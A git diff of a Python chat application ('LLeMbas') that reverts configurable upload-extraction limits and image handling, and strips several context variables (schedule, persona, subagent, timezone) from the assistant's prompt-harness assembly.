"""What extraction is allowed to spend, for one process.
|
||||
|
||||
A snapshot rather than a lookup per call: `prepare` and everything under it
|
||||
are called from routes, from tool runners and from the startup sweep, and
|
||||
several of them have no session in hand. The pattern and the cost are the
|
||||
same as `services/branding.py` -- one query per process, dropped when the
|
||||
admin page saves, and stale across workers until each next reads.
|
||||
"""
|
||||
|
||||
max_upload_bytes: int = MAX_UPLOAD_BYTES
|
||||
max_image_edge: int = MAX_IMAGE_EDGE
|
||||
jpeg_quality: int = JPEG_QUALITY
|
||||
max_pdf_pages: int = MAX_PDF_PAGES
|
||||
max_extracted_chars: int = MAX_EXTRACTED_CHARS
|
||||
orphan_hours: int = 24
|
||||
extra_text_extensions: tuple[str, ...] = ()
|
||||
reject_unreadable_pdf: bool = False
|
||||
|
||||
def media_type_for(self, extension: str) -> str | None:
|
||||
"""The media type for a text extension, or None if it is not one.
|
||||
|
||||
The built-in table first, then the administrator's additions as plain
|
||||
text. Additions are extensions and not a mapping, because the mapping is
|
||||
a thing somebody would have to get right twice and the media type of a
|
||||
`.env` is `text/plain` whatever anybody types.
|
||||
"""
|
||||
if extension in TEXT_EXTENSIONS:
|
||||
return TEXT_EXTENSIONS[extension]
|
||||
return "text/plain" if extension in self.extra_text_extensions else None
|
||||
|
||||
|
||||
_LIMITS: Limits | None = None
|
||||
|
||||
|
||||
def limits() -> Limits:
|
||||
"""The current extraction limits. Never raises -- see `branding.snapshot`."""
|
||||
global _LIMITS
|
||||
if _LIMITS is not None:
|
||||
return _LIMITS
|
||||
try:
|
||||
from lembas.db.session import session_scope
|
||||
from lembas.services import settings_store
|
||||
|
||||
with session_scope() as db:
|
||||
values = settings_store.extraction(db)
|
||||
_LIMITS = Limits(
|
||||
max_upload_bytes=int(values["max_upload_mb"]) * 1024 * 1024,
|
||||
max_image_edge=int(values["max_image_edge"]),
|
||||
jpeg_quality=int(values["jpeg_quality"]),
|
||||
max_pdf_pages=int(values["max_pdf_pages"]),
|
||||
max_extracted_chars=int(values["max_extracted_chars"]),
|
||||
orphan_hours=int(values["orphan_hours"]),
|
||||
extra_text_extensions=tuple(
|
||||
_clean_extension(item) for item in values["extra_text_extensions"]
|
||||
),
|
||||
reject_unreadable_pdf=bool(values.get("reject_unreadable_pdf")),
|
||||
)
|
||||
except Exception: # noqa: BLE001 - the shipped defaults are a usable answer
|
||||
log.debug("could not read extraction settings; using defaults", exc_info=True)
|
||||
return Limits()
|
||||
return _LIMITS
|
||||
|
||||
|
||||
def _clean_extension(raw: str) -> str:
|
||||
value = str(raw or "").strip().lower()
|
||||
if not value:
|
||||
return ""
|
||||
return value if value.startswith(".") else f".{value}"
|
||||
|
||||
|
||||
def forget() -> None:
|
||||
"""Drop the snapshot. Called by the admin page's save, and by tests."""
|
||||
global _LIMITS
|
||||
_LIMITS = None
|
||||
|
||||
|
||||
class FileError(Exception):
|
||||
"""A rejected upload, with a message fit to show the user."""
|
||||
|
||||
@@ -226,7 +135,6 @@ def _looks_like_pdf(payload: bytes) -> bool:
|
||||
|
||||
# --- Processing --------------------------------------------------------------
|
||||
def _process_image(payload: bytes) -> Prepared:
|
||||
bounds = limits()
|
||||
try:
|
||||
with Image.open(io.BytesIO(payload)) as image:
|
||||
image.load()
|
||||
@@ -237,8 +145,8 @@ def _process_image(payload: bytes) -> Prepared:
|
||||
|
||||
width, height = frame.size
|
||||
longest = max(width, height)
|
||||
if longest > bounds.max_image_edge:
|
||||
scale = bounds.max_image_edge / longest
|
||||
if longest > MAX_IMAGE_EDGE:
|
||||
scale = MAX_IMAGE_EDGE / longest
|
||||
frame = frame.resize(
|
||||
(max(1, int(width * scale)), max(1, int(height * scale))),
|
||||
Image.LANCZOS,
|
||||
@@ -249,7 +157,7 @@ def _process_image(payload: bytes) -> Prepared:
|
||||
frame.save(buffer, format="PNG", optimize=True)
|
||||
media_type, extension = "image/png", ".png"
|
||||
else:
|
||||
frame.save(buffer, format="JPEG", quality=bounds.jpeg_quality, optimize=True)
|
||||
frame.save(buffer, format="JPEG", quality=JPEG_QUALITY, optimize=True)
|
||||
media_type, extension = "image/jpeg", ".jpg"
|
||||
|
||||
return Prepared(
|
||||
@@ -267,7 +175,6 @@ def _process_image(payload: bytes) -> Prepared:
|
||||
|
||||
|
||||
def _process_pdf(payload: bytes) -> Prepared:
|
||||
bounds = limits()
|
||||
from pypdf import PdfReader
|
||||
from pypdf.errors import PdfReadError
|
||||
|
||||
@@ -291,7 +198,7 @@ def _process_pdf(payload: bytes) -> Prepared:
|
||||
chunks: list[str] = []
|
||||
total = 0
|
||||
|
||||
for index, page in enumerate(reader.pages[:bounds.max_pdf_pages]):
|
||||
for index, page in enumerate(reader.pages[:MAX_PDF_PAGES]):
|
||||
try:
|
||||
text = page.extract_text() or ""
|
||||
except Exception as exc: # noqa: BLE001 - one bad page is not fatal
|
||||
@@ -301,14 +208,14 @@ def _process_pdf(payload: bytes) -> Prepared:
|
||||
continue
|
||||
chunks.append(f"[page {index + 1}]\n{text.strip()}")
|
||||
total += len(text)
|
||||
if total >= bounds.max_extracted_chars:
|
||||
if total >= MAX_EXTRACTED_CHARS:
|
||||
prepared.truncated = True
|
||||
break
|
||||
|
||||
if prepared.pages > bounds.max_pdf_pages:
|
||||
if prepared.pages > MAX_PDF_PAGES:
|
||||
prepared.truncated = True
|
||||
|
||||
prepared.extracted_text = "\n\n".join(chunks)[:bounds.max_extracted_chars]
|
||||
prepared.extracted_text = "\n\n".join(chunks)[:MAX_EXTRACTED_CHARS]
|
||||
|
||||
if not prepared.extracted_text.strip():
|
||||
# Almost always a scan. Saying so beats the model silently ignoring
|
||||
@@ -329,7 +236,6 @@ def _process_pdf(payload: bytes) -> Prepared:
|
||||
|
||||
|
||||
def _process_text(payload: bytes, filename: str) -> Prepared:
|
||||
bounds = limits()
|
||||
for encoding in ("utf-8", "utf-16", "latin-1"):
|
||||
try:
|
||||
text = payload.decode(encoding)
|
||||
@@ -344,73 +250,28 @@ def _process_text(payload: bytes, filename: str) -> Prepared:
|
||||
if "\x00" in text[:4096]:
|
||||
raise FileError("That file is not text, and is not a format LLeMbas can read.")
|
||||
|
||||
truncated = len(text) > bounds.max_extracted_chars
|
||||
truncated = len(text) > MAX_EXTRACTED_CHARS
|
||||
extension = Path(filename).suffix.lower()
|
||||
|
||||
return Prepared(
|
||||
payload=payload,
|
||||
kind=KIND_TEXT,
|
||||
media_type=bounds.media_type_for(extension) or "text/plain",
|
||||
extension=extension if bounds.media_type_for(extension) else ".txt",
|
||||
extracted_text=text[:bounds.max_extracted_chars],
|
||||
media_type=TEXT_EXTENSIONS.get(extension, "text/plain"),
|
||||
extension=extension if extension in TEXT_EXTENSIONS else ".txt",
|
||||
extracted_text=text[:MAX_EXTRACTED_CHARS],
|
||||
truncated=truncated,
|
||||
)
|
||||
|
||||
|
||||
def _keep_image(payload: bytes) -> Prepared:
|
||||
"""An image stored as it arrived, measured but not re-encoded.
|
||||
|
||||
`_process_image` exists to protect the window from a phone camera: eight
|
||||
megapixels of JPEG become 1400px of JPEG at quality 85, and for something
|
||||
somebody photographed that is all upside. For an image *this application
|
||||
asked a diffusion model to make*, at a size somebody chose, it is a visible
|
||||
loss on the one output the feature exists to produce -- soft detail and
|
||||
ringing on exactly the fine texture the prompt was about.
|
||||
|
||||
Still opened by Pillow, so a malformed file is still refused and the
|
||||
dimensions are still real rather than claimed; still bounded by
|
||||
`MAX_UPLOAD_BYTES` in `prepare`. What is skipped is only the resize and the
|
||||
transcode.
|
||||
"""
|
||||
detected = _detect_image(payload)
|
||||
if detected is None:
|
||||
raise FileError("That is not an image.")
|
||||
media_type, extension = detected
|
||||
try:
|
||||
with Image.open(io.BytesIO(payload)) as image:
|
||||
image.load()
|
||||
width, height = image.size
|
||||
except Image.DecompressionBombError as exc:
|
||||
raise FileError("That image's dimensions are implausibly large.") from exc
|
||||
except (UnidentifiedImageError, OSError, ValueError) as exc:
|
||||
raise FileError("That image could not be read. Is it corrupt?") from exc
|
||||
|
||||
return Prepared(
|
||||
payload=payload,
|
||||
kind=KIND_IMAGE,
|
||||
media_type=media_type,
|
||||
extension=extension,
|
||||
width=width,
|
||||
height=height,
|
||||
)
|
||||
|
||||
|
||||
def prepare(payload: bytes, filename: str, *, keep_original: bool = False) -> Prepared:
|
||||
"""Inspect an upload, decide what it is, and process it accordingly.
|
||||
|
||||
`keep_original` is for an image the application produced rather than one
|
||||
somebody sent: see `_keep_image`. It applies to images only -- there is no
|
||||
argument for keeping an unparsed PDF, and the text path stores its bytes
|
||||
verbatim already.
|
||||
"""
|
||||
def prepare(payload: bytes, filename: str) -> Prepared:
|
||||
"""Inspect an upload, decide what it is, and process it accordingly."""
|
||||
if not payload:
|
||||
raise FileError("That file is empty.")
|
||||
ceiling = limits().max_upload_bytes
|
||||
if len(payload) > ceiling:
|
||||
raise FileError(f"Files must be under {ceiling // (1024 * 1024)} MB.")
|
||||
if len(payload) > MAX_UPLOAD_BYTES:
|
||||
raise FileError(f"Files must be under {MAX_UPLOAD_BYTES // (1024 * 1024)} MB.")
|
||||
|
||||
if _detect_image(payload) is not None:
|
||||
return _keep_image(payload) if keep_original else _process_image(payload)
|
||||
return _process_image(payload)
|
||||
if _looks_like_pdf(payload):
|
||||
return _process_pdf(payload)
|
||||
return _process_text(payload, filename)
|
||||
@@ -430,19 +291,9 @@ def store(
|
||||
chat_id: str | None,
|
||||
payload: bytes,
|
||||
filename: str,
|
||||
keep_original: bool = False,
|
||||
source_path: str = "",
|
||||
source_label: str = "",
|
||||
message_id: str | None = None,
|
||||
) -> Attachment:
|
||||
"""Process and persist an upload. Raises FileError if it is unusable.
|
||||
|
||||
`message_id` is normally left null -- an upload is bound to a turn by
|
||||
`claim()` when the message is sent. A generated image is the mirror image of
|
||||
that: it exists *because* a reply is being written, so it says which turn it
|
||||
belongs to at the moment it is made.
|
||||
"""
|
||||
prepared = prepare(payload, filename, keep_original=keep_original)
|
||||
"""Process and persist an upload. Raises FileError if it is unusable."""
|
||||
prepared = prepare(payload, filename)
|
||||
|
||||
stored_name = f"{secrets.token_hex(16)}{prepared.extension}"
|
||||
(attachments_dir() / stored_name).write_bytes(prepared.payload)
|
||||
@@ -450,7 +301,6 @@ def store(
|
||||
attachment = Attachment(
|
||||
user_id=user_id,
|
||||
chat_id=chat_id,
|
||||
message_id=message_id,
|
||||
filename=safe_display_name(filename),
|
||||
stored_name=stored_name,
|
||||
media_type=prepared.media_type,
|
||||
@@ -462,8 +312,6 @@ def store(
|
||||
pages=prepared.pages,
|
||||
truncated=prepared.truncated,
|
||||
extraction_error=prepared.extraction_error,
|
||||
source_path=source_path[:1000],
|
||||
source_label=source_label[:200],
|
||||
)
|
||||
db.add(attachment)
|
||||
db.commit()
|
||||
@@ -501,7 +349,7 @@ def store_text(
|
||||
on the tag around it, which is what a reader sees on the chip and what
|
||||
survives if the text is later truncated away from its own first line.
|
||||
"""
|
||||
body = text[:limits().max_extracted_chars]
|
||||
body = text[:MAX_EXTRACTED_CHARS]
|
||||
payload = body.encode("utf-8")
|
||||
|
||||
stored_name = f"{secrets.token_hex(16)}.txt"
|
||||
@@ -621,19 +469,6 @@ def claim(db: DBSession, *, ids: list[str], user_id: str, message_id: str) -> li
|
||||
|
||||
Only unclaimed attachments belonging to this user are taken, so a stray or
|
||||
forged id cannot pull someone else's file into a conversation.
|
||||
|
||||
**`chat_id` is set here, and it was not.** `POST /api/files` takes one, and
|
||||
the composer sends it -- but only once a chat exists. A file picked on the
|
||||
*new-chat* screen is stored before there is a chat to name, so its
|
||||
`chat_id` stayed NULL for the rest of its life even after the message it
|
||||
belongs to was sent. Six places filter on that column, and every one of them
|
||||
was quietly wrong about those files: the harness did not name them among the
|
||||
attached documents, the canvas refused to open them, and
|
||||
`remove_files_for_chats` could not find them to delete -- so the temporary
|
||||
sweep, the one caller it had, was removing nothing.
|
||||
|
||||
Read from the message rather than passed in, so no caller can bind an
|
||||
attachment to one chat and a message in another.
|
||||
"""
|
||||
if not ids:
|
||||
return []
|
||||
@@ -647,11 +482,8 @@ def claim(db: DBSession, *, ids: list[str], user_id: str, message_id: str) -> li
|
||||
)
|
||||
)
|
||||
)
|
||||
message = db.get(Message, message_id)
|
||||
for attachment in pending:
|
||||
attachment.message_id = message_id
|
||||
if message is not None:
|
||||
attachment.chat_id = message.chat_id
|
||||
db.commit()
|
||||
return pending
|
||||
|
||||
@@ -676,19 +508,12 @@ def remove_files_for_chats(db: DBSession, chat_ids: list[str]) -> int:
|
||||
return removed
|
||||
|
||||
|
||||
def sweep_orphans(db: DBSession, older_than: timedelta | None = None) -> int:
|
||||
def sweep_orphans(db: DBSession, older_than: timedelta = ORPHAN_AGE) -> int:
|
||||
"""Delete uploads that were never attached to a message.
|
||||
|
||||
A file picked in the composer and then abandoned would otherwise sit on
|
||||
disk forever.
|
||||
|
||||
`older_than` defaults to the configured age rather than to a constant, and
|
||||
it is resolved *here* rather than in the signature: a default argument is
|
||||
evaluated at import, so a module-level `ORPHAN_AGE` in the signature would
|
||||
pin the shipped 24 hours whatever an administrator later set.
|
||||
"""
|
||||
if older_than is None:
|
||||
older_than = timedelta(hours=limits().orphan_hours)
|
||||
cutoff = datetime.now(UTC) - older_than
|
||||
orphans = list(db.scalars(select(Attachment).where(Attachment.message_id.is_(None))))
|
||||
|
||||
@@ -724,44 +549,3 @@ def data_uri(attachment: Attachment) -> str | None:
|
||||
return None
|
||||
encoded = base64.b64encode(path.read_bytes()).decode("ascii")
|
||||
return f"data:{attachment.media_type};base64,{encoded}"
|
||||
|
||||
|
||||
def preview_data_uri(payload: bytes, *, max_edge: int = 0) -> str | None:
|
||||
"""The same thing for bytes in hand, downscaled, for a model to look at.
|
||||
|
||||
Fidelity and weight are two different jobs. What is stored is what ComfyUI
|
||||
produced, because that is the artefact somebody keeps; what is *shown to a
|
||||
model to be judged* wants to be small, because a 400KB PNG is 550KB of
|
||||
base64 in a request that exists only to answer one question.
|
||||
|
||||
Takes bytes rather than an Attachment: the reviewer looks at an image that
|
||||
may be about to be thrown away, and writing a row for something rejected
|
||||
seconds later is work with nothing to show for it.
|
||||
|
||||
`max_edge` of 0 means the configured one. Zero rather than None because the
|
||||
caller that passes a number passes a number, and a sentinel that is also a
|
||||
plausible value would be worse -- an edge of zero is not a picture.
|
||||
"""
|
||||
import base64
|
||||
|
||||
max_edge = max_edge or limits().max_image_edge
|
||||
|
||||
try:
|
||||
with Image.open(io.BytesIO(payload)) as image:
|
||||
image.load()
|
||||
frame = image.convert("RGB")
|
||||
longest = max(frame.size)
|
||||
if longest > max_edge:
|
||||
scale = max_edge / longest
|
||||
frame = frame.resize(
|
||||
(max(1, int(frame.width * scale)), max(1, int(frame.height * scale))),
|
||||
Image.LANCZOS,
|
||||
)
|
||||
buffer = io.BytesIO()
|
||||
frame.save(buffer, format="JPEG", quality=limits().jpeg_quality, optimize=True)
|
||||
except (Image.DecompressionBombError, UnidentifiedImageError, OSError, ValueError):
|
||||
log.warning("could not build a preview of a generated image", exc_info=True)
|
||||
return None
|
||||
|
||||
encoded = base64.b64encode(buffer.getvalue()).decode("ascii")
|
||||
return f"data:image/jpeg;base64,{encoded}"
|
||||
|
||||
+114
-1175
File diff suppressed because it is too large
Load Diff
+10
-270
@@ -33,58 +33,23 @@ clearing those fragments in the admin page restores it exactly.
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
from datetime import datetime
|
||||
from typing import Any
|
||||
|
||||
from sqlalchemy import select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import KIND_TASK, User
|
||||
from lembas.services import branding, prompts, settings_store
|
||||
from lembas.services import personas as personas_service
|
||||
from lembas.db.models import User
|
||||
from lembas.services import prompts, settings_store
|
||||
from lembas.services.library import memories as memories_service
|
||||
from lembas.services.library import skills as skills_service
|
||||
from lembas.services.schedule import clock
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# A ceiling on the whole block, so that a large library cannot quietly eat the
|
||||
# context window. An administrator can lower it; `max_harness_chars` of 0 means
|
||||
# "use this".
|
||||
#
|
||||
# It has to be larger than everything the shipped defaults are already allowed
|
||||
# to put in, and at 8000 it was not. The fragments alone are about 7,900
|
||||
# characters for an agent chat, and on top of that `index_chars` grants a 2,000
|
||||
# character project listing and `instructions_chars` a 4,000 character
|
||||
# AGENTS.md -- both defaults, both on by default. The block was therefore cut at
|
||||
# 8,000 on an ordinary agent chat, and `prompts.assemble` cuts the *tail*, which
|
||||
# by fragment order is exactly the context worth having: the listing was severed
|
||||
# mid-tree and `context.agent_instructions` was dropped in its entirety. The one
|
||||
# path by which a project's own instructions reach a model did not reach it.
|
||||
#
|
||||
# The two big blocks already carry their own budgets, applied before assembly,
|
||||
# so they are bounded whatever this is. What this bounds is the *fragments*
|
||||
# growing without anybody noticing -- so it is set above the sum of what those
|
||||
# budgets grant, with room for the plan and the memories beside them.
|
||||
#
|
||||
# 20,000 rather than 16,000, which the shipped set had grown to within 1,300
|
||||
# characters of. A ceiling this close to the content is one the next fragment
|
||||
# crosses, and crossing it is silent: `assemble` cuts the tail, and the tail is
|
||||
# the project's own AGENTS.md. `tests/test_harness.py` pins a margin now as well
|
||||
# as a fit, so the room is a fact rather than a hope.
|
||||
#
|
||||
# 24,000 now, because that margin did its job: adding `core.commit` and
|
||||
# `tool.agent_edits` took the headroom under 20% and the test said so rather
|
||||
# than the AGENTS.md quietly losing its last paragraph on somebody's install.
|
||||
# Raising the ceiling costs nothing by itself -- it is a limit, not a size, and
|
||||
# the assembled block is the same length either way. What it buys is that the
|
||||
# margin keeps meaning what it says.
|
||||
MAX_HARNESS_CHARS = 24000
|
||||
|
||||
# How much of the ceiling the shipped fragments may occupy at full budget. The
|
||||
# rest is headroom for an administrator's own wording, which is the thing this
|
||||
# limit exists to leave room for -- an override is usually longer than the
|
||||
# default it replaces, not shorter.
|
||||
HARNESS_MARGIN = 0.2
|
||||
# context window. Memory and skills have their own caps below this one. An
|
||||
# administrator can lower it; `max_harness_chars` of 0 means "use this".
|
||||
MAX_HARNESS_CHARS = 8000
|
||||
|
||||
# How many attached filenames to name in the prompt. Enough to show what the
|
||||
# tags will look like, few enough that a chat with thirty files does not spend
|
||||
@@ -116,32 +81,6 @@ def _tool_names(tools: list[dict[str, Any]]) -> str:
|
||||
)
|
||||
|
||||
|
||||
def _image_templates(db: DBSession) -> str:
|
||||
"""One line per workflow, name and description.
|
||||
|
||||
The description is the load-bearing half, the same way it is for a skill:
|
||||
it is the only thing the model has to choose with, and "workflow-2" is not
|
||||
a choice. Capped, because a list of thirty costs the window on every
|
||||
request forever.
|
||||
"""
|
||||
from lembas.db.models import ImageWorkflow
|
||||
|
||||
rows = list(
|
||||
db.scalars(
|
||||
select(ImageWorkflow)
|
||||
.where(ImageWorkflow.enabled.is_(True))
|
||||
.order_by(ImageWorkflow.position, ImageWorkflow.slug)
|
||||
.limit(12)
|
||||
)
|
||||
)
|
||||
return "\n".join(f"- {row.slug}: {row.description or row.name}" for row in rows)
|
||||
|
||||
|
||||
def _image_models(db: DBSession) -> str:
|
||||
"""The checkpoints an administrator has listed, comma separated."""
|
||||
return ", ".join(settings_store.images(db).get("checkpoints") or [])
|
||||
|
||||
|
||||
def _document_names(db: DBSession, chat) -> str:
|
||||
"""The names of the non-image files attached anywhere in this chat."""
|
||||
from lembas.db.models import Attachment
|
||||
@@ -177,122 +116,30 @@ def context_variables(
|
||||
|
||||
offered = tools or []
|
||||
families = _families(db, offered)
|
||||
# The reader's zone, not the server's. Telling somebody in another country
|
||||
# that it is Tuesday when it is Wednesday where they are was survivable
|
||||
# while the answer was only ever prose; it stops being survivable the moment
|
||||
# they can say "every Monday at 3" and something has to work out when that
|
||||
# is. `zone_for` falls back to the server's, so an instance where nobody has
|
||||
# set one behaves exactly as it always did.
|
||||
stamp = clock.now_for(user)
|
||||
stamp = datetime.now().astimezone()
|
||||
|
||||
values: dict[str, str] = {
|
||||
"today": stamp.strftime("%A %-d %B %Y"),
|
||||
"now": stamp.strftime("%A %-d %B %Y, %H:%M (UTC%z)"),
|
||||
# Named so a model working out a schedule can say which zone it meant,
|
||||
# and so `core.today` can carry it without a second fragment.
|
||||
#
|
||||
# The fallback is load-bearing and used to be absent. `name_for` returns
|
||||
# "" for anybody who has never chosen a zone -- the default state of
|
||||
# every account -- and the comment here claimed that dropped the line
|
||||
# rather than announcing the server's zone as a decision. It did not:
|
||||
# `substitute` drops a line only when it is *blank* after expansion, and
|
||||
# this variable sits inside a sentence, so every such request shipped
|
||||
# "- Times the person gives you are in unless they say otherwise."
|
||||
#
|
||||
# Naming the server's zone was never the thing being avoided anyway.
|
||||
# `stamp` is `clock.now_for(user)`, which already falls back to it, so
|
||||
# `{{today}}` and `{{now}}` are *already* in that zone and `{{now}}`
|
||||
# already prints its offset. Withholding the label from a value the
|
||||
# model has been given is not restraint, it is a hole. This is the
|
||||
# fallback `schedule/compile.py` has always had, for the same reason.
|
||||
"timezone": clock.name_for(user) or str(clock.server_zone()),
|
||||
"instance_name": branding.for_db(db).name,
|
||||
"instance_name": str(settings_store.get(db, "instance_name") or "LLeMbas"),
|
||||
"user_name": (user.name or "") if user is not None else "",
|
||||
"model_name": "",
|
||||
# What this request will actually allow, so the model is not told a
|
||||
# number that is not its own. `tools_service.MAX_ROUNDS` is only the
|
||||
# fallback for callers with no session.
|
||||
"max_rounds": str(settings_store.chat_rounds(db) or 0),
|
||||
# Not rendered anywhere. It is the gate on `core.rounds`: an ordinary
|
||||
# chat has a ceiling worth planning within, an agent chat is told to
|
||||
# keep going instead, and those are different sentences rather than the
|
||||
# same sentence with a different number in it. Blank when there is no
|
||||
# ceiling at all, so the fragment vanishes rather than promising zero.
|
||||
"round_budget": str(settings_store.chat_rounds(db) or ""),
|
||||
# The complement, and the gate on `core.keep_working`. Exactly one of
|
||||
# the two is ever set: a model told it has a budget rations it and stops
|
||||
# early to report progress, and one told to keep going does the work.
|
||||
# Not rendered anywhere either.
|
||||
"unbounded": "" if settings_store.chat_rounds(db) else "yes",
|
||||
"max_rounds": str(tools_service.MAX_ROUNDS),
|
||||
"memory_limit": str(memories_service.MAX_MEMORY_CHARS),
|
||||
"tool_names": _tool_names(offered),
|
||||
"memories": memories_service.block(db, user) if "memory" in families else "",
|
||||
"skills": (
|
||||
skills_service.index_block(db, user, exclude=tools_service.scoped_skills_off(chat))
|
||||
if "skills" in families
|
||||
else ""
|
||||
),
|
||||
# What can be drawn, and with what. Guarded by family for the reason the
|
||||
# memory block is: an instance with no ComfyUI must not pay a settings
|
||||
# read and a table scan to tell a model about a tool it was not offered.
|
||||
# Database reads only -- `context_variables` is synchronous and on the
|
||||
# request path, so asking ComfyUI itself what it has would hold the
|
||||
# request open while somebody's box thought about it. The admin page
|
||||
# discovers; this reads what it stored.
|
||||
"image_templates": _image_templates(db) if "image" in families else "",
|
||||
"image_models": _image_models(db) if "image" in families else "",
|
||||
"image_instructions": (
|
||||
str(settings_store.images(db).get("instructions") or "") if "image" in families else ""
|
||||
),
|
||||
"skills": skills_service.index_block(db, user) if "skills" in families else "",
|
||||
"knowledge_bases": "",
|
||||
"document_names": "",
|
||||
"agent_target": "",
|
||||
"agent_dir": "",
|
||||
"agent_mode": "",
|
||||
"agent_rewound": "",
|
||||
"background": "",
|
||||
"background_notify": "",
|
||||
"project_files": "",
|
||||
"agent_instructions": "",
|
||||
"agent_instructions_file": "",
|
||||
"plan": "",
|
||||
"plan_editable": "",
|
||||
# Empty everywhere but a scheduled task's own chat, which is what makes
|
||||
# it the gate on `core.unattended` as well as the content of
|
||||
# `context.schedule`. Two fragments, one variable, and no way for the
|
||||
# warning to appear without the thing it warns about.
|
||||
"schedule_instruction": "",
|
||||
"schedule_summary": "",
|
||||
# Set only in a helper's own chat, and the gate on `core.subagent`.
|
||||
# Deliberately not the same variable as `schedule_instruction` even
|
||||
# though both mean "nobody is reading": the two say different things to
|
||||
# a model, and one fragment covering both would have to say neither.
|
||||
"subagent": "",
|
||||
# Set only in the chat of a model that has been asked a question by
|
||||
# another one, and the gate on `core.friend`. A third way of being
|
||||
# somebody's child, and a third thing to say: a helper is doing a job, a
|
||||
# scheduled task is running unwatched, and this one is being asked for an
|
||||
# opinion. One fragment covering all three would say nothing useful to
|
||||
# any of them.
|
||||
"friend": "",
|
||||
# Who else is here. Filled below, where the chat's own model is known --
|
||||
# a model does not need telling that it exists.
|
||||
"model_roster": "",
|
||||
# Who this model is, and what it makes of the person in front of it.
|
||||
# Family-gated like the memories block, and for the same two reasons: a
|
||||
# model that may not keep either has no business being handed them, and
|
||||
# the query should not happen at all on an instance that does not use
|
||||
# this.
|
||||
"persona": "",
|
||||
"person_view": "",
|
||||
}
|
||||
|
||||
if chat is not None:
|
||||
# `ROLE_FRIEND` is imported here rather than at the top for the reason
|
||||
# `chat_service` is: `services/tools.py` imports the subagent module and
|
||||
# this one, and a top-level import back is a cycle.
|
||||
from lembas.services import chat as chat_service
|
||||
from lembas.services.subagent import ROLE_FRIEND
|
||||
|
||||
model = chat_service.model_for(db, chat)
|
||||
values["model_name"] = model.label if model is not None else chat.model_id
|
||||
@@ -310,65 +157,11 @@ def context_variables(
|
||||
if "agent" in families:
|
||||
values.update(_agent_values(db, chat, user))
|
||||
|
||||
# Not gated on a family: a scheduled task has no tools of its own, and
|
||||
# the thing that must reach the model is precisely that nobody is
|
||||
# reading. One primary-key lookup, the same deal `plan` gets.
|
||||
if chat.kind == KIND_TASK:
|
||||
values.update(_schedule_values(db, chat, user))
|
||||
|
||||
# Not gated on a family either, and for the same reason: what has to
|
||||
# reach a helper is that it is one. A column read, no query.
|
||||
if chat.parent_chat_id:
|
||||
# Which *kind* of child, because the two read differently. A friend
|
||||
# is marked on its scope by `subagent._create_child`; anything else
|
||||
# with a parent is a helper.
|
||||
if (chat.scope_json or {}).get("role") == ROLE_FRIEND:
|
||||
values["friend"] = "yes"
|
||||
else:
|
||||
values["subagent"] = "yes"
|
||||
|
||||
# Only for a model that can actually ask one of them something. A list
|
||||
# of peers it cannot reach is context spent on nothing -- the same
|
||||
# argument that gates the memories block on the memory family, and the
|
||||
# reason the roster and the tool are one checkbox rather than two.
|
||||
if "friend" in families:
|
||||
values["model_roster"] = chat_service.roster_block(
|
||||
db, user, exclude=chat.model_id
|
||||
)
|
||||
|
||||
if "persona" in families:
|
||||
key = chat.model_id
|
||||
values["persona"] = personas_service.block(db, key, None)
|
||||
values["person_view"] = personas_service.block(db, key, user)
|
||||
|
||||
return values
|
||||
|
||||
|
||||
def _schedule_values(db: DBSession, chat, user) -> dict[str, str]:
|
||||
"""What a scheduled task's chat is for, and how often it comes round.
|
||||
|
||||
A task chat accumulates every run, so by the tenth the original instruction
|
||||
is far out of sight up the transcript. Put back in front of the model each
|
||||
turn rather than left to be inferred -- exactly what `Chat.plan_message_id`
|
||||
exists to do for a plan.
|
||||
"""
|
||||
from lembas.services import schedules as schedules_service
|
||||
|
||||
schedule = schedules_service.for_chat(db, chat)
|
||||
if schedule is None:
|
||||
# The schedule was removed and its chat kept. There is nothing standing
|
||||
# to say, so the fragments vanish rather than describing a timer that no
|
||||
# longer exists.
|
||||
return {}
|
||||
return {
|
||||
"schedule_instruction": schedule.instruction or schedule.request or "",
|
||||
"schedule_summary": schedules_service.describe(schedule, owner=user),
|
||||
}
|
||||
|
||||
|
||||
def _agent_values(db: DBSession, chat, user) -> dict[str, str]:
|
||||
"""What an agent chat's harness needs to say about where it is."""
|
||||
from lembas.services import plans as plans_service
|
||||
from lembas.services import settings_store
|
||||
from lembas.services.agent import index as index_service
|
||||
from lembas.services.agent import policy
|
||||
@@ -387,64 +180,11 @@ def _agent_values(db: DBSession, chat, user) -> dict[str, str]:
|
||||
"agent_dir": context.project_dir or "the login directory",
|
||||
"agent_mode": policy.MODE_GUIDANCE.get(context.mode, ""),
|
||||
"agent_rewound": rewound,
|
||||
# Non-empty only when commands may run in the background, which is what
|
||||
# gates the fragment telling the model so.
|
||||
"background": "on" if context.background else "",
|
||||
# Its own gate, because the runner branches on it and the guidance
|
||||
# above says a turn will arrive. See `tool.background_notify`.
|
||||
"background_notify": "on" if context.background_notify else "",
|
||||
"max_rounds": str(context.limits.steps),
|
||||
# Blanked, which is what makes `core.rounds` vanish here: `steps` is a
|
||||
# runaway backstop and telling a model it has a budget of two hundred
|
||||
# invites it to ration one. `unbounded` is its complement and is what
|
||||
# `core.keep_working` is gated on, so an agent chat always gets the
|
||||
# keep-going half whatever the instance setting says.
|
||||
"round_budget": "",
|
||||
"unbounded": "yes",
|
||||
"project_files": _project_files(db, chat, context, settings_store, index_service),
|
||||
# Already resolved on the context, from one primary-key lookup in
|
||||
# `agent_session.resolve`. A plan the model cannot see is a plan it
|
||||
# cannot keep current, which is the whole of why this is here.
|
||||
"plan": plans_service.render_block(context.plan),
|
||||
# Whether `plan_update` is actually in this request, which is not the
|
||||
# same question as whether there is a plan. `agent/tools.py` drops it in
|
||||
# Plan mode -- that mode ends with `plan_submit` instead -- so gating its
|
||||
# guidance on `plan` alone told a model in Plan mode to "keep it current
|
||||
# with plan_update as you go" about a tool that was not there, directly
|
||||
# under `core.tool_list` saying anything unnamed does not exist. The
|
||||
# fragment's own hint claimed the two coincided. They do not, and this
|
||||
# is the variable that makes them.
|
||||
"plan_editable": (
|
||||
plans_service.render_block(context.plan) if context.mode != policy.MODE_PLAN else ""
|
||||
),
|
||||
**_project_instructions(db, chat, context, settings_store),
|
||||
}
|
||||
|
||||
|
||||
def _project_instructions(db: DBSession, chat, context, settings_store) -> dict[str, str]:
|
||||
"""The project's own AGENTS.md, from cache and never fetched.
|
||||
|
||||
Written to mirror `_project_files` line for line, and under the same rule:
|
||||
